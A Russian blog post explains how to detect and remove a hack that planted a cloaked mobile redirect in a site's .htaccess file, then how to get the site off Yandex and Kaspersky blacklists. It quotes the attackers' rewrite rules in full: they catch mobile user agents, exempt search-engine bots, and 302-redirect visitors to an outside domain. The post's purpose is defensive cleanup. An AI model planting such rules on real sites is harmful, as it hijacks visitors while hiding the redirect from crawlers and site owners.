Как продает товары интернет-магазин Ламода
29 марта 2015
Ваш сайт взломали! Как найти и устранить беду
Исследования
0
1669
29 марта 2015
Итак, что мы имеем?
В поиске Яндекса этому сайту стала приписываться вот такая надпись:
Сайт может угрожать безопасности вашего компьютера или мобильного устройства
При переходе на сайт ничего страшного не происходит. Это потому что вирус или скорее дор ориентирован на мобильные устройства и планшеты. И если зайти на сайт с какого нибудь смартфона, то вас перекинут на какой-то левый сайт, в данном случае, это сайт onlineg4.net.
Вот такой код залили злоумышленники в файлик .htaccess на хостинге:
RewriteCond %{HTTP_USER_AGENT} (android | midp | j2me | symbian | series\ 60 | symbos | windows\ mobile | windows\ ce | ppc | smartphone | blackberry | mtk | bada | windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona | ia_archiver | antabot | ask\ jeeves | baidu | dcpbot | eltaindexer | feedfetcher | gamespy | gigabot | googlebot | gsa-crawler | grub-client | gulper | slurp | mihalism | msnbot | worldindexer | ooyyo | pagebull | scooter | w3c_validator | jigsaw | webalta | yahoofeedseeker | yahoo!\ slurp | mmcrawler | yandexbot | yandeximages | yandexvideo | yandexmedia | yandexblogs | yandexaddurl |
yandexfavicons | yandexdirect | yandexmetrika | yandexcatalog | yandexnews | yandeximageresizer) [NC]
RewriteRule (.*) http://onlineg4.net/u/9024 [L,R=302]
Тут не сложно было догадаться и найти его, как правило такой вредоносный редирект ставят в начале файла. Его можно с легкостью удалить и писать в Яндекс о том, что теперь с сайтом все в порядке и его стоит исключить из черного списка.
Более того, хочу сказать, что если у вас или ваших посетителей будет установлен антивирус Касперского, то ваш сайт еще поместят в черный список баз Касперского. После очистки сайта стоит еще писать в тех.поддержку Касперского с просьбой удалить сайт из их черного списка, а то пользователи никогда не попадут на ваш сайт.
Вот такой вот случай произошел, скажу он не редкость и, как правило, его легко устранить. Достаточно элементарных знаний кода:
- просматриваем файлик .htaccess, который лежит в корне вашего сайта;
- ищем в нем, как правило в начале, домен какого-то левого сайта, к которому вы не имеете отношения;
- ищем слова похожие на android | midp | j2me | symbian | series\ 60 | symbos | windows\ mobile | windows\ ce | ppc | smartphone | blackberry | mtk | bada | windows\ phone, то есть это с каких операционных систем люди будут перенаправляться на левый сайт;
- ищем название ботов gamespy | gigabot | googlebot | gsa-crawler | grub-client | gulper | slurp | mihalism | msnbot | worldindexer | ooyyo | pagebull | scooter | w3c_validator | jigsaw | webalta | yahoofeedseeker | yahoo;
- и самое последнее, ищем 302 редирект, потому что ставят именно его, не знаю с чем это связано, может они верят, что 302 редирект — это временный редирект.
Вот так можно выявить взлом сайта. Удачи и защищайте свои сайты от коварных злоумышленников.
Мнение автора является его собственностью и не претендует на истину в последней инстанции.
Отзыв о Телеком медиа по разработке сайта
29 марта 2015
Отзывы о PayPerProfits. Часть 2
29 марта 2015
Что делать если вас все-таки кинул фрилансер
29 марта 2015
Мой отзыв о BuzzBundle
29 марта 2015
Отзывы об ООО ОТКЛИК АДВ
29 марта 2015
Как запалить сетку сайтов
29 марта 2015
Влияние телевизора на сон
29 марта 2015
Можно ли выиграть плюшевого мишку в дартс
29 марта 2015
Можно ли выйграть в он-лайн рулетку. Часть 2
29 марта 2015